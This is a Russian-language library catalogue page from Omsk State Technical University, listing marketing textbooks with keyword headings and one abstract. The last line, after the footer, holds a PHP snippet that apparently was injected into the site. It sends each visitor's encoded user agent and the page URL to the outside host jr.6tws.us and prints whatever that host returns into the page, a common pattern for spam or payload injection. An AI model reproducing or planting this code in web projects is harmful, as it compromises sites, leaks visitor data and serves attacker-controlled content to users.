Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

61 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПОЛИТИКА ТОВАРНАЯ - МАРКЕТИНГ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Маркетинг в отраслях и сферах деятельности [Текст] / ред. Н. А. Нагапетьянц, 2014. - 281 с.
Ключевые слова 
МАРКЕТИНГ ПРОМЫШЛЕННЫХ ТОВАРОВ -- ПРОМЫШЛЕННОСТЬ - МАРКЕТИНГ -- ПОЛИТИКА ТОВАРНАЯ - МАРКЕТИНГ -- МАРКЕТИНГ - ПРЕДПРИЯТИЕ -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- УПРАВЛЕНИЕ МАРКЕТИНГОМ -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- АГРОБИЗНЕС - МАРКЕТИНГ -- АГРОМАРКЕТИНГ -- ТОРГОВЛЯ - МАРКЕТИНГ -- ТОРГОВЛЯ ОПТОВАЯ - МАРКЕТИНГ -- ТОРГОВЛЯ РОЗНИЧНАЯ - МАРКЕТИНГ -- ХОЗЯЙСТВО СКЛАДСКОЕ - МАРКЕТИНГ -- МАРКЕТИНГ СТРАТЕГИЧЕСКИЙ -- КОНКУРЕНТОСПОСОБНОСТЬ ТОВАРА -- ПОСРЕДНИК ТОРГОВЫЙ -- СФЕРА УСЛУГ - МАРКЕТИНГ -- МАРКЕТИНГ УСЛУГ -- ПОЛИТИКА КОММУНИКАЦИОННАЯ - МАРКЕТИНГ -- УСЛУГИ КОММЕРЧЕСКО-ПОСРЕДНИЧЕСКИЕ -- УСЛУГИ ТРАНСПОРТНЫЕ -- УСЛУГИ ТУРИСТСКИЕ -- УСЛУГИ СТРАХОВЫЕ -- УСЛУГИ БАНКОВСКИЕ -- УСЛУГИ ОБРАЗОВАТЕЛЬНЫЕ -- МАРКЕТИНГ УСЛУГ ОБРАЗОВАТЕЛЬНЫХ -- УСЛУГИ ПРОИЗВОДСТВЕННЫЕ -- УСЛУГИ АУДИТОРСКИЕ -- УСЛУГИ КОНСАЛТИНГОВЫЕ -- УСЛУГИ СЕРВИСНЫЕ -- ЗАДАЧА ПРИКЛАДНАЯ -- МЕТОД РЕШЕНИЯ ПРИКЛАДНЫХ ЗАДАЧ
Держатели документа (Информация об экземплярах) 
2. 
Основы предпринимательской деятельности [Текст] / ред. В. М. Власова, 1995. - 493, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Синяева И. М. Практикум по маркетингу [Текст] : практикум / И. М. Синяева, С. В. Земляк, В. В. Синяев ; ред. Л. П. Дашков, 2009. - 238 с.
Держатели документа (Информация об экземплярах) 
4. 
Маркетинг [Текст] : Учебник гриф-МО / Н. П. Ващекин [и др.], 2004. - 312 с.
Ключевые слова 
ПОТРЕБНОСТЬ - Маркетинг -- МОТИВАЦИЯ - Маркетинг -- СПРОС - Маркетинг -- ТОВАР - Маркетинг -- РЫНОК - Маркетинг -- МАРКЕТИНГ - СЛОВАРЬ ТЕРМИНОВ -- МАРКЕТИНГ потребительских товаров -- МАРКЕТИНГ промышленный -- МАРКЕТИНГ УСЛУГ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ИНФОРМАЦИЯ МАРКЕТИНГОВАЯ -- Прогноз маркетинговый -- МАРКЕТИНГ компьютерный -- Маркетинг - автоматизация -- СРЕДА ВНЕШНЯЯ - МАРКЕТИНГ -- АНАЛИЗ рынка -- КОНЪЮНКТУРА РЫНКА - анализ -- ПОВЕДЕНИЕ ПОКУПАТЕЛЯ -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- КОФЕ - ТОРГОВЛЯ -- АУДИТ МАРКЕТИНГА -- МАРКЕТИНГ ЦЕЛЕВОЙ -- СЕГМЕНТАЦИЯ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- МАРКЕТИНГ ОПЕРАТИВНЫЙ -- ПОЛИТИКА ТОВАРНАЯ - Маркетинг -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- АССОРТИМЕНТ ТОВАРНЫЙ -- ЗНАК ТОВАРНЫЙ -- КОНКУРЕНТОСПОСОБНОСТЬ ТОВАРА -- ЦЕНА - МАРКЕТИНГ -- РЕКЛАМА - Маркетинг -- РЕКЛАМА ВНУТРИФИРМЕННАЯ -- Реклама общественная -- Реклама товарная -- Медиапланирование -- ЭФФЕКТИВНОСТЬ рекламы -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- КОНТРОЛЬ МАРКЕТИНГОВЫЙ -- Кейс - метод - Маркетинг
Держатели документа (Информация об экземплярах) 
5. 
Маркетинг [Текст] : Учеб. для студентов вузов обучающихся по специальностям "Маркетинг", "Коммерция (торговое дело)", "Реклама" / Т. Н. Парамонова, С. М. Самарина, И. Н. Красюк и др; Под ред. Н. П. Ващекина, 2003. - 311 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- АУДИТ -- СЕГМЕНТИРОВАНИЕ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ -- ТОВАР -- ТОВАРНАЯ ПОЛИТИКА -- ЦЕНА -- МАРКЕТИНГ промышленный -- МАРКЕТИНГ УСЛУГ -- РЕШЕНИЕ маркетинговое -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ИНФОРМАЦИЯ МАРКЕТИНГОВАЯ -- Прогноз маркетинговый -- МАРКЕТИНГ компьютерный -- Маркетинг - автоматизация -- СРЕДА ВНЕШНЯЯ - МАРКЕТИНГ -- АНАЛИЗ рынка -- КОНЪЮНКТУРА РЫНКА - анализ -- ПОВЕДЕНИЕ ПОКУПАТЕЛЯ -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- АНАЛИЗ предприятия -- АУДИТ МАРКЕТИНГА -- МАРКЕТИНГ ЦЕЛЕВОЙ -- СЕГМЕНТАЦИЯ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- МАРКЕТИНГ ОПЕРАТИВНЫЙ -- ПОЛИТИКА ТОВАРНАЯ - Маркетинг -- ЦЕНА - МАРКЕТИНГ -- РЕКЛАМА - Маркетинг -- РЕКЛАМА ВНУТРИФИРМЕННАЯ -- Реклама общественная -- Реклама товарная -- Медиапланирование -- ЭФФЕКТИВНОСТЬ рекламы -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- КОНТРОЛЬ МАРКЕТИНГОВЫЙ -- Кейс - метод - Маркетинг

Излагается современная концепция маркетинга. Рассматриваются его типы и виды. Описана система маркетинговой информации, в частности основные принципы ее построения. Подробно освещаются вопросы маркетинговых исследований рынка, в том числе изучения <конъюнктуры> <рынка> и моделей <поведения> <покупателей>. Проводится всестороний анализ деятельности <предприятия> с точки зрения маркетинга. Изучаются направления оперативного маркетинга и связанные с этим проблемы <ценообразования>. Большой материал посвящен организации <рекламных мероприятий>.

Во втором издании учтены изменения, произошедшие в практике маркетинга за последние годы.

В каждой теме даны контрольные вопросы и практические задания. В последнем разделе приведены кейсы для проверки знаний по всему курсу маркетинга.

6. 
Основы предпринимательской деятельности [Текст] : Эконом. теория. Маркетинг. Финансовый менеджмент / В. М. Власова, Д. Л. Волков, С. А. Кулаков и др., 1996. - 494 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2965 - 23.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.65 с.12 запросов, 0.38c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;